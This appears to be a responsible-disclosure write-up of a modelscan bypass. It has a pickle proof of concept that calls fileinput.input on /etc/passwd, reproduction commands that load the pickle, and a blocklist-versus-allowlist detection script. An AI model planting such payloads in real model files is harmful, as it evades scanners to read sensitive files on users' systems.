---
license: mit
tags:
  - security-research
  - modelscan-bypass
  - pickle-safety
---

# modelscan-bypass-fileinput

## Modelscan Bypass PoC — fileinput.input

- Severity: MEDIUM
- Impact: Arbitrary file read; `fileinput.input(files)` reads any file accessible to the process
- modelscan version: 0.7.6 (latest on PyPI at the time of writing)
- Result: "No issues found!" ✅ (false negative)

## Chain

```
fileinput.input(["/etc/passwd"]) → reads sensitive files
```

The pickle's REDUCE opcode calls `fileinput.input` with the target path. Note that `fileinput.input` returns a `FileInput` object and opens the file lazily: the read itself happens when whatever loaded the pickle iterates the returned object or calls `readline()` on it, not at unpickling time.

## Why It Works

modelscan's pickle scanner checks the module and attribute of each `GLOBAL` / `STACK_GLOBAL` reference against its `unsafe_globals` blocklist. Neither the `fileinput` module nor `fileinput.input` appears in that list, so the `REDUCE` call that invokes `fileinput.input([...])` is not reported and the scan ends with "No issues found!". Any standard-library callable with side effects that the blocklist omits bypasses the scan the same way; a blocklist can only catch what it names.
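As an added example (not part of this PoC repository and not modelscan's own code), the script below builds the `fileinput.input` payload in memory, walks its opcodes with `pickletools.genops` without ever unpickling it, and compares a modelscan-style blocklist with a module allowlist. The `BLOCKLIST` and `ALLOWED_MODULES` sets are constructed for illustration and are not modelscan's real `unsafe_globals` settings.

```python
# Added example, not part of the original PoC repository or of modelscan itself.
# Builds the fileinput.input payload in memory (never loaded here) and compares a
# blocklist scan with an allowlist scan over the pickle's GLOBAL / STACK_GLOBAL
# references. BLOCKLIST and ALLOWED_MODULES are constructed illustrative sets,
# not modelscan's real unsafe_globals table.
import fileinput
import pickle
import pickletools


class FileInputPayload:
    """Pickles to a call of fileinput.input([target]) when loaded."""

    def __init__(self, target):
        self.target = target

    def __reduce__(self):
        # REDUCE opcode: callable + args, i.e. fileinput.input(["/etc/passwd"])
        return (fileinput.input, ([self.target],))


def build_payload(target="/etc/passwd"):
    """Serialize the PoC object; the bytes are only inspected below, never loaded."""
    return pickle.dumps(FileInputPayload(target), protocol=4)


_STRING_OPS = {"SHORT_BINUNICODE", "BINUNICODE", "BINUNICODE8",
               "UNICODE", "STRING", "SHORT_BINSTRING", "BINSTRING"}


def referenced_globals(data):
    """(module, name) pairs the pickle would import, found by disassembly only.

    pickletools.genops decodes opcodes without executing anything. Strings are
    tracked on a small shadow stack so STACK_GLOBAL (protocol 4+) can be
    resolved as well as the older GLOBAL opcode, whose arg is "module name".
    """
    strings = []
    found = []
    for op, arg, _pos in pickletools.genops(data):
        if op.name in _STRING_OPS:
            strings.append(arg)
        elif op.name == "GLOBAL":
            module, name = arg.split(" ", 1)
            found.append((module, name))
        elif op.name == "STACK_GLOBAL":
            name = strings.pop()
            module = strings.pop()
            found.append((module, name))
    return found


# Constructed blocklist in the spirit of modelscan's unsafe_globals (not its real contents).
BLOCKLIST = {
    ("os", "system"), ("subprocess", "Popen"), ("builtins", "eval"),
    ("builtins", "exec"), ("builtins", "open"), ("socket", "socket"),
}

# Assumed allowlist of modules a tensor checkpoint legitimately needs.
ALLOWED_MODULES = {"torch", "torch._utils", "collections",
                   "numpy", "numpy.core.multiarray"}


def blocklist_findings(data):
    """Flag only globals on the blocklist: the approach that misses fileinput.input."""
    return [g for g in referenced_globals(data) if g in BLOCKLIST]


def allowlist_findings(data):
    """Flag every global whose module is not explicitly allowed."""
    return [g for g in referenced_globals(data) if g[0] not in ALLOWED_MODULES]


if __name__ == "__main__":
    payload = build_payload()
    print("globals:  ", referenced_globals(payload))
    print("blocklist:", blocklist_findings(payload) or "no issues found (false negative)")
    print("allowlist:", allowlist_findings(payload))
```

The blocklist pass returns nothing for this payload, mirroring the false negative above, while the allowlist pass reports `("fileinput", "input")`. The shadow-stack tracking is deliberately minimal (it only follows string opcodes) and is enough for this payload; a production scanner should resolve `BINGET`/`MEMOIZE` references as well.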

## Reproduction

```bash
pip install modelscan
modelscan scan -p bypass_poc.pkl
# Output: "No issues found!"
python3 -c "import pickle; pickle.loads(open('bypass_poc.pkl','rb').read())"
# Runs the pickled call, fileinput.input(["/etc/passwd"]), in the loading process
```

## Responsible Disclosure

This PoC is part of a responsible disclosure to ProtectAI via the Huntr MFV program.